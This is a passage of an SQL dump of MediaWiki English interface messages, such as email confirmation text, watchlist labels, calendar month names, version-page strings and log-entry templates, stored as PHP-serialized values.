belief\";'),('en','messages:exif-iimcategory-sci','s:22:\"Science and technology\";'),('en','messages:exif-iimcategory-soi','s:13:\"Social issues\";'),('en','messages:exif-iimcategory-spo','s:6:\"Sports\";'),('en','messages:exif-iimcategory-war','s:24:\"War, conflict and unrest\";'),('en','messages:exif-iimcategory-wea','s:7:\"Weather\";'),('en','messages:exif-urgency-normal','s:11:\"Normal ($1)\";'),('en','messages:exif-urgency-low','s:8:\"Low ($1)\";'),('en','messages:exif-urgency-high','s:9:\"High ($1)\";'),('en','messages:exif-urgency-other','s:26:\"User-defined priority ($1)\";'),('en','messages:watchlistall2','s:3:\"all\";'),('en','messages:namespacesall','s:3:\"all\";'),('en','messages:monthsall','s:3:\"all\";'),('en','messages:confirmemail','s:21:\"Confirm email address\";'),('en','messages:confirmemail_noemail','s:91:\"You do not have a valid email address set in your [[Special:Preferences|user preferences]].\";'),('en','messages:confirmemail_text','s:281:\"{{SITENAME}} requires that you validate your email address before using email features.\nActivate the button below to send a confirmation mail to your address.\nThe mail will include a link containing a code;\nload the link in your browser to confirm that your email address is valid.\";'),('en','messages:confirmemail_pending','s:179:\"A confirmation code has already been emailed to you;\nif you recently created your account, you may wish to wait a few minutes for it to arrive before trying to request a new code.\";'),('en','messages:confirmemail_send','s:24:\"Mail a confirmation code\";'),('en','messages:confirmemail_sent','s:24:\"Confirmation email sent.\";'),('en','messages:confirmemail_oncreate','s:174:\"A confirmation code was sent to your email address.\nThis code is not required to log in, but you will need to provide it before enabling any email-based features in the wiki.\";'),('en','messages:confirmemail_sendfailed','s:128:\"{{SITENAME}} could not send your confirmation mail.\nPlease check your email address for invalid characters.\n\nMailer returned: $1\";'),('en','messages:confirmemail_invalid','s:53:\"Invalid confirmation code.\nThe code may have expired.\";'),('en','messages:confirmemail_needlogin','s:40:\"Please $1 to confirm your email address.\";'),('en','messages:confirmemail_success','s:99:\"Your email address has been confirmed.\nYou may now [[Special:UserLogin|log in]] and enjoy the wiki.\";'),('en','messages:confirmemail_loggedin','s:42:\"Your email address has now been confirmed.\";'),('en','messages:confirmemail_subject','s:39:\"{{SITENAME}} email address confirmation\";'),('en','messages:confirmemail_body','s:397:\"Someone, probably you, from IP address $1,\nhas registered an account \"$2\" with this email address on {{SITENAME}}.\n\nTo confirm that this account really does belong to you and activate\nemail features on {{SITENAME}}, open this link in your browser:\n\n$3\n\nIf you did *not* register the account, follow this link\nto cancel the email address confirmation:\n\n$5\n\nThis confirmation code will expire at $4.\";'),('en','messages:confirmemail_body_changed','s:412:\"Someone, probably you, from IP address $1,\nhas changed the email address of the account \"$2\" to this address on {{SITENAME}}.\n\nTo confirm that this account really does belong to you and reactivate\nemail features on {{SITENAME}}, open this link in your browser:\n\n$3\n\nIf the account does *not* belong to you, follow this link\nto cancel the email address confirmation:\n\n$5\n\nThis confirmation code will expire at $4.\";'),('en','messages:confirmemail_body_set','s:406:\"Someone, probably you, from IP address $1,\nhas set the email address of the account \"$2\" to this address on {{SITENAME}}.\n\nTo confirm that this account really does belong to you and activate\nemail features on {{SITENAME}}, open this link in your browser:\n\n$3\n\nIf the account does *not* belong to you, follow this link\nto cancel the email address confirmation:\n\n$5\n\nThis confirmation code will expire at $4.\";'),('en','messages:confirmemail_invalidated','s:35:\"Email address confirmation canceled\";'),('en','messages:invalidateemail','s:25:\"Cancel email confirmation\";'),('en','messages:scarytranscludedisabled','s:36:\"[Interwiki transcluding is disabled]\";'),('en','messages:scarytranscludefailed','s:30:\"[Template fetch failed for $1]\";'),('en','messages:scarytranscludefailed-httpstatus','s:39:\"[Template fetch failed for $1: HTTP $2]\";'),('en','messages:scarytranscludetoolong','s:17:\"[URL is too long]\";'),('en','messages:deletedwhileediting','s:74:\"Warning: This page was deleted after you started editing!\";'),('en','messages:confirmrecreate','s:173:\"User [[User:$1|$1]] ([[User talk:$1|talk]]) deleted this page after you started editing with reason:\n: $2\nPlease confirm that you really want to recreate this page.\";'),('en','messages:confirmrecreate-noreason','s:147:\"User [[User:$1|$1]] ([[User talk:$1|talk]]) deleted this page after you started editing. Please confirm that you really want to recreate this page.\";'),('en','messages:recreate','s:8:\"Recreate\";'),('en','messages:unit-pixel','s:2:\"px\";'),('en','messages:confirm_purge_button','s:2:\"OK\";'),('en','messages:confirm-purge-top','s:29:\"Clear the cache of this page?\";'),('en','messages:confirm-purge-bottom','s:79:\"Purging a page clears the cache and forces the most current revision to appear.\";'),('en','messages:confirm-watch-button','s:2:\"OK\";'),('en','messages:confirm-watch-top','s:32:\"Add this page to your watchlist?\";'),('en','messages:confirm-unwatch-button','s:2:\"OK\";'),('en','messages:confirm-unwatch-top','s:37:\"Remove this page from your watchlist?\";'),('en','messages:semicolon-separator','s:6:\"; \";'),('en','messages:comma-separator','s:6:\", \";'),('en','messages:colon-separator','s:6:\": \";'),('en','messages:autocomment-prefix','s:0:\"\";'),('en','messages:pipe-separator','s:11:\" | \";'),('en','messages:word-separator','s:5:\" \";'),('en','messages:ellipsis','s:3:\"...\";'),('en','messages:percent','s:3:\"$1%\";'),('en','messages:parentheses','s:4:\"($1)\";'),('en','messages:brackets','s:4:\"[$1]\";'),('en','messages:quotation-marks','s:4:\"\"$1\"\";'),('en','messages:imgmultipageprev','s:17:\"← previous page\";'),('en','messages:imgmultipagenext','s:13:\"next page →\";'),('en','messages:imgmultigo','s:3:\"Go!\";'),('en','messages:imgmultigoto','s:13:\"Go to page $1\";'),('en','messages:img-lang-opt','s:7:\"$2 ($1)\";'),('en','messages:img-lang-default','s:18:\"(default language)\";'),('en','messages:img-lang-info','s:27:\"Render this image in $1. $2\";'),('en','messages:img-lang-go','s:2:\"Go\";'),('en','messages:ascending_abbrev','s:3:\"asc\";'),('en','messages:descending_abbrev','s:4:\"desc\";'),('en','messages:table_pager_next','s:9:\"Next page\";'),('en','messages:table_pager_prev','s:13:\"Previous page\";'),('en','messages:table_pager_first','s:10:\"First page\";'),('en','messages:table_pager_last','s:9:\"Last page\";'),('en','messages:table_pager_limit','s:22:\"Show $1 items per page\";'),('en','messages:table_pager_limit_label','s:15:\"Items per page:\";'),('en','messages:table_pager_limit_submit','s:2:\"Go\";'),('en','messages:table_pager_empty','s:10:\"No results\";'),('en','messages:autosumm-blank','s:16:\"Blanked the page\";'),('en','messages:autosumm-replace','s:26:\"Replaced content with \"$1\"\";'),('en','messages:autoredircomment','s:25:\"Redirected page to [[$1]]\";'),('en','messages:autosumm-new','s:22:\"Created page with \"$1\"\";'),('en','messages:autosumm-newblank','s:18:\"Created blank page\";'),('en','messages:autoblock_whitelist','s:406:\"AOL http://webmaster.info.aol.com/proxyinfo.html\n*64.12.96.0/19\n*149.174.160.0/20\n*152.163.240.0/21\n*152.163.248.0/22\n*152.163.252.0/23\n*152.163.96.0/22\n*152.163.100.0/23\n*195.93.32.0/22\n*195.93.48.0/22\n*195.93.64.0/19\n*195.93.96.0/19\n*195.93.16.0/20\n*198.81.0.0/22\n*198.81.16.0/20\n*198.81.8.0/23\n*202.67.64.128/25\n*205.188.192.0/20\n*205.188.208.0/23\n*205.188.112.0/20\n*205.188.146.144/30\n*207.200.112.0/21\";'),('en','messages:size-bytes','s:4:\"$1 B\";'),('en','messages:size-kilobytes','s:5:\"$1 KB\";'),('en','messages:size-megabytes','s:5:\"$1 MB\";'),('en','messages:size-gigabytes','s:5:\"$1 GB\";'),('en','messages:size-terabytes','s:5:\"$1 TB\";'),('en','messages:size-petabytes','s:5:\"$1 PB\";'),('en','messages:size-exabytes','s:5:\"$1 EB\";'),('en','messages:size-zetabytes','s:5:\"$1 ZB\";'),('en','messages:size-yottabytes','s:5:\"$1 YB\";'),('en','messages:bitrate-bits','s:6:\"$1 bps\";'),('en','messages:bitrate-kilobits','s:7:\"$1 kbps\";'),('en','messages:bitrate-megabits','s:7:\"$1 Mbps\";'),('en','messages:bitrate-gigabits','s:7:\"$1 Gbps\";'),('en','messages:bitrate-terabits','s:7:\"$1 Tbps\";'),('en','messages:bitrate-petabits','s:7:\"$1 Pbps\";'),('en','messages:bitrate-exabits','s:7:\"$1 Ebps\";'),('en','messages:bitrate-zetabits','s:7:\"$1 Zbps\";'),('en','messages:bitrate-yottabits','s:7:\"$1 Ybps\";'),('en','messages:lag-warn-normal','s:81:\"Changes newer than $1 {{PLURAL:$1|second|seconds}} may not be shown in this list.\";'),('en','messages:lag-warn-high','s:114:\"Due to high database server lag, changes newer than $1 {{PLURAL:$1|second|seconds}} may not be shown in this list.\";'),('en','messages:editwatchlist-summary','s:0:\"\";'),('en','messages:watchlistedit-normal-title','s:14:\"Edit watchlist\";'),('en','messages:watchlistedit-normal-legend','s:28:\"Remove titles from watchlist\";'),('en','messages:watchlistedit-normal-explain','s:197:\"Titles on your watchlist are shown below.\nTo remove a title, check the box next to it, and click \"{{int:Watchlistedit-normal-submit}}\".\nYou can also [[Special:EditWatchlist/raw|edit the raw list]].\";'),('en','messages:watchlistedit-normal-submit','s:13:\"Remove titles\";'),('en','messages:watchlistedit-normal-done','s:69:\"{{PLURAL:$1|1 title was|$1 titles were}} removed from your watchlist:\";'),('en','messages:watchlistedit-raw-title','s:18:\"Edit raw watchlist\";'),('en','messages:watchlistedit-raw-legend','s:18:\"Edit raw watchlist\";'),('en','messages:watchlistedit-raw-explain','s:241:\"Titles on your watchlist are shown below, and can be edited by adding to and removing from the list;\none title per line.\nWhen finished, click \"{{int:Watchlistedit-raw-submit}}\".\nYou can also [[Special:EditWatchlist|use the standard editor]].\";'),('en','messages:watchlistedit-raw-titles','s:7:\"Titles:\";'),('en','messages:watchlistedit-raw-submit','s:16:\"Update watchlist\";'),('en','messages:watchlistedit-raw-done','s:32:\"Your watchlist has been updated.\";'),('en','messages:watchlistedit-raw-added','s:47:\"{{PLURAL:$1|1 title was|$1 titles were}} added:\";'),('en','messages:watchlistedit-raw-removed','s:49:\"{{PLURAL:$1|1 title was|$1 titles were}} removed:\";'),('en','messages:watchlistedit-clear-title','s:17:\"Cleared watchlist\";'),('en','messages:watchlistedit-clear-legend','s:15:\"Clear watchlist\";'),('en','messages:watchlistedit-clear-explain','s:53:\"All of the titles will be removed from your watchlist\";'),('en','messages:watchlistedit-clear-titles','s:7:\"Titles:\";'),('en','messages:watchlistedit-clear-submit','s:40:\"Clear the watchlist (This is permanent!)\";'),('en','messages:watchlistedit-clear-done','s:32:\"Your watchlist has been cleared.\";'),('en','messages:watchlistedit-clear-removed','s:49:\"{{PLURAL:$1|1 title was|$1 titles were}} removed:\";'),('en','messages:watchlistedit-too-many','s:41:\"There are too many pages to display here.\";'),('en','messages:watchlisttools-clear','s:19:\"Clear the watchlist\";'),('en','messages:watchlisttools-view','s:21:\"View relevant changes\";'),('en','messages:watchlisttools-edit','s:23:\"View and edit watchlist\";'),('en','messages:watchlisttools-raw','s:18:\"Edit raw watchlist\";'),('en','messages:iranian-calendar-m1','s:9:\"Farvardin\";'),('en','messages:iranian-calendar-m2','s:11:\"Ordibehesht\";'),('en','messages:iranian-calendar-m3','s:7:\"Khordad\";'),('en','messages:iranian-calendar-m4','s:3:\"Tir\";'),('en','messages:iranian-calendar-m5','s:6:\"Mordad\";'),('en','messages:iranian-calendar-m6','s:9:\"Shahrivar\";'),('en','messages:iranian-calendar-m7','s:4:\"Mehr\";'),('en','messages:iranian-calendar-m8','s:4:\"Aban\";'),('en','messages:iranian-calendar-m9','s:4:\"Azar\";'),('en','messages:iranian-calendar-m10','s:3:\"Dey\";'),('en','messages:iranian-calendar-m11','s:6:\"Bahman\";'),('en','messages:iranian-calendar-m12','s:6:\"Esfand\";'),('en','messages:hijri-calendar-m1','s:8:\"Muharram\";'),('en','messages:hijri-calendar-m2','s:5:\"Safar\";'),('en','messages:hijri-calendar-m3','s:14:\"Rabi\' al-awwal\";'),('en','messages:hijri-calendar-m4','s:14:\"Rabi\' al-thani\";'),('en','messages:hijri-calendar-m5','s:15:\"Jumada al-awwal\";'),('en','messages:hijri-calendar-m6','s:15:\"Jumada al-thani\";'),('en','messages:hijri-calendar-m7','s:5:\"Rajab\";'),('en','messages:hijri-calendar-m8','s:8:\"Sha\'aban\";'),('en','messages:hijri-calendar-m9','s:7:\"Ramadan\";'),('en','messages:hijri-calendar-m10','s:7:\"Shawwal\";'),('en','messages:hijri-calendar-m11','s:13:\"Dhu al-Qi\'dah\";'),('en','messages:hijri-calendar-m12','s:13:\"Dhu al-Hijjah\";'),('en','messages:hebrew-calendar-m1','s:7:\"Tishrei\";'),('en','messages:hebrew-calendar-m2','s:8:\"Cheshvan\";'),('en','messages:hebrew-calendar-m3','s:6:\"Kislev\";'),('en','messages:hebrew-calendar-m4','s:5:\"Tevet\";'),('en','messages:hebrew-calendar-m5','s:6:\"Shevat\";'),('en','messages:hebrew-calendar-m6','s:4:\"Adar\";'),('en','messages:hebrew-calendar-m6a','s:6:\"Adar I\";'),('en','messages:hebrew-calendar-m6b','s:7:\"Adar II\";'),('en','messages:hebrew-calendar-m7','s:5:\"Nisan\";'),('en','messages:hebrew-calendar-m8','s:4:\"Iyar\";'),('en','messages:hebrew-calendar-m9','s:5:\"Sivan\";'),('en','messages:hebrew-calendar-m10','s:5:\"Tamuz\";'),('en','messages:hebrew-calendar-m11','s:2:\"Av\";'),('en','messages:hebrew-calendar-m12','s:4:\"Elul\";'),('en','messages:hebrew-calendar-m1-gen','s:7:\"Tishrei\";'),('en','messages:hebrew-calendar-m2-gen','s:8:\"Cheshvan\";'),('en','messages:hebrew-calendar-m3-gen','s:6:\"Kislev\";'),('en','messages:hebrew-calendar-m4-gen','s:5:\"Tevet\";'),('en','messages:hebrew-calendar-m5-gen','s:6:\"Shevat\";'),('en','messages:hebrew-calendar-m6-gen','s:4:\"Adar\";'),('en','messages:hebrew-calendar-m6a-gen','s:6:\"Adar I\";'),('en','messages:hebrew-calendar-m6b-gen','s:7:\"Adar II\";'),('en','messages:hebrew-calendar-m7-gen','s:5:\"Nisan\";'),('en','messages:hebrew-calendar-m8-gen','s:4:\"Iyar\";'),('en','messages:hebrew-calendar-m9-gen','s:5:\"Sivan\";'),('en','messages:hebrew-calendar-m10-gen','s:5:\"Tamuz\";'),('en','messages:hebrew-calendar-m11-gen','s:2:\"Av\";'),('en','messages:hebrew-calendar-m12-gen','s:4:\"Elul\";'),('en','messages:signature','s:52:\"[[{{ns:user}}:$1|$2]] ([[{{ns:user_talk}}:$1|talk]])\";'),('en','messages:signature-anon','s:36:\"[[{{#special:Contributions}}/$1|$2]]\";'),('en','messages:timezone-utc','s:3:\"UTC\";'),('en','messages:unknown_extension_tag','s:26:\"Unknown extension tag \"$1\"\";'),('en','messages:duplicate-defaultsort','s:88:\"Warning: Default sort key \"$2\" overrides earlier default sort key \"$1\".\";'),('en','messages:duplicate-displaytitle','s:82:\"Warning: Display title \"$2\" overrides earlier display title \"$1\".\";'),('en','messages:version','s:7:\"Version\";'),('en','messages:version-summary','s:0:\"\";'),('en','messages:version-extensions','s:20:\"Installed extensions\";'),('en','messages:version-skins','s:15:\"Installed skins\";'),('en','messages:version-specialpages','s:13:\"Special pages\";'),('en','messages:version-parserhooks','s:12:\"Parser hooks\";'),('en','messages:version-variables','s:9:\"Variables\";'),('en','messages:version-antispam','s:15:\"Spam prevention\";'),('en','messages:version-api','s:3:\"API\";'),('en','messages:version-other','s:5:\"Other\";'),('en','messages:version-mediahandlers','s:14:\"Media handlers\";'),('en','messages:version-hooks','s:5:\"Hooks\";'),('en','messages:version-parser-extensiontags','s:21:\"Parser extension tags\";'),('en','messages:version-parser-function-hooks','s:21:\"Parser function hooks\";'),('en','messages:version-hook-name','s:9:\"Hook name\";'),('en','messages:version-hook-subscribedby','s:13:\"Subscribed by\";'),('en','messages:version-version','s:4:\"($1)\";'),('en','messages:version-no-ext-name','s:9:\"[no name]\";'),('en','messages:version-svn-revision','s:3:\"r$1\";'),('en','messages:version-license','s:17:\"MediaWiki License\";'),('en','messages:version-ext-license','s:7:\"License\";'),('en','messages:version-ext-colheader-name','s:9:\"Extension\";'),('en','messages:version-skin-colheader-name','s:4:\"Skin\";'),('en','messages:version-ext-colheader-version','s:7:\"Version\";'),('en','messages:version-ext-colheader-license','s:7:\"License\";'),('en','messages:version-ext-colheader-description','s:11:\"Description\";'),('en','messages:version-ext-colheader-credits','s:7:\"Authors\";'),('en','messages:version-license-title','s:14:\"License for $1\";'),('en','messages:version-license-not-found','s:61:\"No detailed license information was found for this extension.\";'),('en','messages:version-credits-title','s:14:\"Credits for $1\";'),('en','messages:version-credits-not-found','s:61:\"No detailed credits information was found for this extension.\";'),('en','messages:version-poweredby-credits','s:105:\"This wiki is powered by [https://www.mediawiki.org/ MediaWiki], copyright © 2001-$1 $2.\";'),('en','messages:version-poweredby-others','s:6:\"others\";'),('en','messages:version-poweredby-translators','s:29:\"translatewiki.net translators\";'),('en','messages:version-credits-summary','s:105:\"We would like to recognize the following persons for their contribution to [[Special:Version|MediaWiki]].\";'),('en','messages:version-license-info','s:777:\"MediaWiki is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.\n\nMediaWiki is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received [{{SERVER}}{{SCRIPTPATH}}/COPYING a copy of the GNU General Public License] along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA or [//www.gnu.org/licenses/old-licenses/gpl-2.0.html read it online].\";'),('en','messages:version-software','s:18:\"Installed software\";'),('en','messages:version-software-product','s:7:\"Product\";'),('en','messages:version-software-version','s:7:\"Version\";'),('en','messages:version-db-mysql-url','s:22:\"https://www.mysql.com/\";'),('en','messages:version-db-mariadb-url','s:20:\"https://mariadb.org/\";'),('en','messages:version-db-percona-url','s:46:\"http://www.percona.com/software/percona-server\";'),('en','messages:version-db-postgres-url','s:26:\"http://www.postgresql.org/\";'),('en','messages:version-db-oracle-url','s:31:\"http://www.oracle.com/database/\";'),('en','messages:version-db-sqlite-url','s:23:\"https://www.sqlite.org/\";'),('en','messages:version-db-mssql-url','s:30:\"https://www.microsoft.com/sql/\";'),('en','messages:version-entrypoints','s:16:\"Entry point URLs\";'),('en','messages:version-entrypoints-header-entrypoint','s:11:\"Entry point\";'),('en','messages:version-entrypoints-header-url','s:3:\"URL\";'),('en','messages:version-entrypoints-articlepath','s:86:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgArticlePath Article path]\";'),('en','messages:version-entrypoints-scriptpath','s:84:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgScriptPath Script path]\";'),('en','messages:version-entrypoints-index-php','s:78:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:index.php index.php]\";'),('en','messages:version-entrypoints-api-php','s:74:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:api.php api.php]\";'),('en','messages:version-entrypoints-load-php','s:76:\"[https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:load.php load.php]\";'),('en','messages:redirect','s:43:\"Redirect by file, user, page or revision ID\";'),('en','messages:redirect-legend','s:26:\"Redirect to a file or page\";'),('en','messages:redirect-text','s:0:\"\";'),('en','messages:redirect-summary','s:314:\"This special page redirects to a file (given the file name), a page (given a revision ID or page ID), or a user page (given a numeric user ID). Usage: [[{{#Special:Redirect}}/file/Example.jpg]], [[{{#Special:Redirect}}/page/64308]], [[{{#Special:Redirect}}/revision/328429]], or [[{{#Special:Redirect}}/user/101]].\";'),('en','messages:redirect-submit','s:2:\"Go\";'),('en','messages:redirect-lookup','s:7:\"Lookup:\";'),('en','messages:redirect-value','s:6:\"Value:\";'),('en','messages:redirect-user','s:7:\"User ID\";'),('en','messages:redirect-page','s:7:\"Page ID\";'),('en','messages:redirect-revision','s:13:\"Page revision\";'),('en','messages:redirect-file','s:9:\"File name\";'),('en','messages:redirect-not-exists','s:15:\"Value not found\";'),('en','messages:fileduplicatesearch','s:26:\"Search for duplicate files\";'),('en','messages:fileduplicatesearch-summary','s:48:\"Search for duplicate files based on hash values.\";'),('en','messages:fileduplicatesearch-legend','s:22:\"Search for a duplicate\";'),('en','messages:fileduplicatesearch-filename','s:9:\"Filename:\";'),('en','messages:fileduplicatesearch-submit','s:6:\"Search\";'),('en','messages:fileduplicatesearch-info','s:52:\"$1 × $2 pixel
                                                                File size: $3
                                                                MIME type: $4\";'),('en','messages:fileduplicatesearch-result-1','s:43:\"The file \"$1\" has no identical duplication.\";'),('en','messages:fileduplicatesearch-result-n','s:82:\"The file \"$1\" has {{PLURAL:$2|1 identical duplication|$2 identical duplications}}.\";'),('en','messages:fileduplicatesearch-noresults','s:25:\"No file named \"$1\" found.\";'),('en','messages:specialpages','s:13:\"Special pages\";'),('en','messages:specialpages-summary','s:0:\"\";'),('en','messages:specialpages-note-top','s:6:\"Legend\";'),('en','messages:specialpages-note','s:97:\"* Normal special pages.\n* Restricted special pages.\";'),('en','messages:specialpages-group-maintenance','s:19:\"Maintenance reports\";'),('en','messages:specialpages-group-other','s:19:\"Other special pages\";'),('en','messages:specialpages-group-login','s:22:\"Login / create account\";'),('en','messages:specialpages-group-changes','s:23:\"Recent changes and logs\";'),('en','messages:specialpages-group-media','s:25:\"Media reports and uploads\";'),('en','messages:specialpages-group-users','s:16:\"Users and rights\";'),('en','messages:specialpages-group-highuse','s:14:\"High use pages\";'),('en','messages:specialpages-group-pages','s:14:\"Lists of pages\";'),('en','messages:specialpages-group-pagetools','s:10:\"Page tools\";'),('en','messages:specialpages-group-wiki','s:14:\"Data and tools\";'),('en','messages:specialpages-group-redirects','s:25:\"Redirecting special pages\";'),('en','messages:specialpages-group-spam','s:10:\"Spam tools\";'),('en','messages:blankpage','s:10:\"Blank page\";'),('en','messages:intentionallyblankpage','s:38:\"This page is intentionally left blank.\";'),('en','messages:external_image_whitelist','s:440:\" #Leave this line exactly as it is
                                                                \n#Put regular expression fragments (just the part that goes between the //) below\n#These will be matched with the URLs of external (hotlinked) images\n#Those that match will be displayed as images, otherwise only a link to the image will be shown\n#Lines beginning with # are treated as comments\n#This is case-insensitive\n\n#Put all regex fragments above this line. Leave this line exactly as it is
                                                                \";'),('en','messages:tags','s:17:\"Valid change tags\";'),('en','messages:tags-summary','s:0:\"\";'),('en','messages:tag-filter','s:28:\"[[Special:Tags|Tag]] filter:\";'),('en','messages:tag-filter-submit','s:6:\"Filter\";'),('en','messages:tag-list-wrapper','s:45:\"([[Special:Tags|{{PLURAL:$1|Tag|Tags}}]]: $2)\";'),('en','messages:tags-title','s:4:\"Tags\";'),('en','messages:tags-intro','s:84:\"This page lists the tags that the software may mark an edit with, and their meaning.\";'),('en','messages:tags-tag','s:8:\"Tag name\";'),('en','messages:tags-display-header','s:26:\"Appearance on change lists\";'),('en','messages:tags-description-header','s:27:\"Full description of meaning\";'),('en','messages:tags-active-header','s:7:\"Active?\";'),('en','messages:tags-hitcount-header','s:14:\"Tagged changes\";'),('en','messages:tags-active-yes','s:3:\"Yes\";'),('en','messages:tags-active-no','s:2:\"No\";'),('en','messages:tags-edit','s:4:\"edit\";'),('en','messages:tags-hitcount','s:31:\"$1 {{PLURAL:$1|change|changes}}\";'),('en','messages:comparepages','s:13:\"Compare pages\";'),('en','messages:comparepages-summary','s:0:\"\";'),('en','messages:compare-page1','s:6:\"Page 1\";'),('en','messages:compare-page2','s:6:\"Page 2\";'),('en','messages:compare-rev1','s:10:\"Revision 1\";'),('en','messages:compare-rev2','s:10:\"Revision 2\";'),('en','messages:compare-submit','s:7:\"Compare\";'),('en','messages:compare-invalid-title','s:35:\"The title you specified is invalid.\";'),('en','messages:compare-title-not-exists','s:39:\"The title you specified does not exist.\";'),('en','messages:compare-revision-not-exists','s:42:\"The revision you specified does not exist.\";'),('en','messages:dberr-problems','s:56:\"Sorry! This site is experiencing technical difficulties.\";'),('en','messages:dberr-again','s:40:\"Try waiting a few minutes and reloading.\";'),('en','messages:dberr-info','s:40:\"(Cannot contact the database server: $1)\";'),('en','messages:dberr-info-hidden','s:36:\"(Cannot contact the database server)\";'),('en','messages:dberr-usegoogle','s:49:\"You can try searching via Google in the meantime.\";'),('en','messages:dberr-outofdate','s:58:\"Note that their indexes of our content may be out of date.\";'),('en','messages:dberr-cachederror','s:71:\"This is a cached copy of the requested page, and may not be up to date.\";'),('en','messages:htmlform-invalid-input','s:43:\"There are problems with some of your input.\";'),('en','messages:htmlform-select-badoption','s:46:\"The value you specified is not a valid option.\";'),('en','messages:htmlform-int-invalid','s:42:\"The value you specified is not an integer.\";'),('en','messages:htmlform-float-invalid','s:40:\"The value you specified is not a number.\";'),('en','messages:htmlform-int-toolow','s:51:\"The value you specified is below the minimum of $1.\";'),('en','messages:htmlform-int-toohigh','s:51:\"The value you specified is above the maximum of $1.\";'),('en','messages:htmlform-required','s:23:\"This value is required.\";'),('en','messages:htmlform-submit','s:6:\"Submit\";'),('en','messages:htmlform-reset','s:12:\"Undo changes\";'),('en','messages:htmlform-selectorother-other','s:5:\"Other\";'),('en','messages:htmlform-no','s:2:\"No\";'),('en','messages:htmlform-yes','s:3:\"Yes\";'),('en','messages:htmlform-chosen-placeholder','s:16:\"Select an option\";'),('en','messages:htmlform-cloner-create','s:8:\"Add more\";'),('en','messages:htmlform-cloner-delete','s:6:\"Remove\";'),('en','messages:htmlform-cloner-required','s:31:\"At least one value is required.\";'),('en','messages:sqlite-has-fts','s:32:\"$1 with full-text search support\";'),('en','messages:sqlite-no-fts','s:35:\"$1 without full-text search support\";'),('en','messages:logentry-delete-delete','s:32:\"$1 {{GENDER:$2|deleted}} page $3\";'),('en','messages:logentry-delete-restore','s:33:\"$1 {{GENDER:$2|restored}} page $3\";'),('en','messages:logentry-delete-event','s:88:\"$1 {{GENDER:$2|changed}} visibility of {{PLURAL:$5|a log event|$5 log events}} on $3: $4\";'),('en','messages:logentry-delete-revision','s:91:\"$1 {{GENDER:$2|changed}} visibility of {{PLURAL:$5|a revision|$5 revisions}} on page $3: $4\";'),('en','messages:logentry-delete-event-legacy','s:55:\"$1 {{GENDER:$2|changed}} visibility of log events on $3\";'),('en','messages:logentry-delete-revision-legacy','s:59:\"$1 {{GENDER:$2|changed}} visibility of revisions on page $3\";'),('en','messages:logentry-suppress-delete','s:35:\"$1 {{GENDER:$2|suppressed}} page $3\";'),('en','messages:logentry-suppress-event','s:97:\"$1 secretly {{GENDER:$2|changed}} visibility of {{PLURAL:$5|a log event|$5 log events}} on $3: $4\";'),('en','messages:logentry-suppress-revision','s:100:\"$1 secretly {{GENDER:$2|changed}} visibility of {{PLURAL:$5|a revision|$5 revisions}} on page $3: $4\";'),('en','messages:logentry-suppress-event-legacy','s:64:\"$1 secretly {{GENDER:$2|changed}} visibility of log events on $3\";'),('en','messages:logentry-suppress-revision-legacy','s:68:\"$1 secretly {{GENDER:$2|changed}} visibility of revisions on page $3\";'),('en','messages:revdelete-content-hid','s:14:\"content hidden\";'),('en','messages:revdelete-summary-hid','s:19:\"edit summary hidden\";'),('en','messages:revdelete-uname-hid','s:15:\"username hidden\";'),('en','messages:revdelete-content-unhid','s:16:\"content unhidden\";'),('en','messages:revdelete-summary-unhid','s:21:\"edit summary unhidden\";'),('en','messages:revdelete-uname-unhid','s:17:\"username unhidden\";'),('en','messages:revdelete-restricted','s:38:\"applied restrictions to administrators\";'),('en','messages:revdelete-unrestricted','s:39:\"removed restrictions for administrators\";'),('en','messages:logentry-move-move','s:36:\"$1 {{GENDER:$2|moved}} page $3 to $4\";'),('en','messages:logentry-move-move-noredirect','s:63:\"$1 {{GENDER:$2|moved}} page $3 to $4 without leaving a redirect\";'),('en','messages:logentry-move-move_redir','s:50:\"$1 {{GENDER:$2|moved}} page $3 to $4 over redirect\";'),('en','messages:logentry-move-move_redir-noredirect','s:79:\"$1 {{GENDER:$2|moved}} page $3 to $4 over a redirect without leaving a redirect\";'),('en','messages:logentry-patrol-patrol','s:56:\"$1 {{GENDER:$2|marked}} revision $4 of page $3 patrolled\";'),('en','messages:logentry-patrol-patrol-auto','s:70:\"$1 automatically {{GENDER:$2|marked}} revision $4 of page $3 patrolled\";'),('en','messages:logentry-newusers-newusers','s:41:\"User account $1 was {{GENDER:$2|created}}\";'),('en','messages:logentry-newusers-create','s:41:\"User account $1 was {{GENDER:$2|created}}\";'),('en','messages:logentry-newusers-create2','s:47:\"User account $3 was {{GENDER:$2|created}} by $1\";'),('en','messages:logentry-newusers-byemail','s:78:\"User account $3 was {{GENDER:$2|created}} by $1 and password was sent by email\";'),('en','messages:logentry-newusers-autocreate','s:55:\"User account $1 was {{GENDER:$2|created}} automatically\";'),('en','messages:logentry-rights-rights','s:62:\"$1 {{GENDER:$2|changed}} group membership for $3 from $4 to $5\";'),('en','messages:logentry-rights-rights-legacy','s:48:\"$1 {{GENDER:$2|changed}} group membership for $3\";'),('en','messages:logentry-rights-autopromote','s:57:\"$1 was automatically {{GENDER:$2|promoted}} from $4 to $5\";'),('en','messages:logentry-upload-upload','s:28:\"$1 {{GENDER:$2|uploaded}} $3\";'),('en','messages:logentry-upload-overwrite','s:45:\"$1 {{GENDER:$2|uploaded}} a new version of $3\";'),('en','messages:logentry-upload-revert','s:28:\"$1 {{GENDER:$2|uploaded}} $3\";'),('en','messages:rightsnone','s:6:\"(none)\";'),('en','messages:revdelete-logentry','s:39:\"changed revision visibility of \"[[$1]]\"\";'),('en','messages:logdelete-logentry','s:36:\"changed event visibility of \"[[$1]]\"\";'),('en','messages:revdelete-content','s:7:\"content\";'),('en','messages:revdelete-summary','s:12:\"edit summary\";'),('en','messages:revdelete-uname','s:8:\"username\";'),('en','messages:revdelete-hid','s:6:\"hid 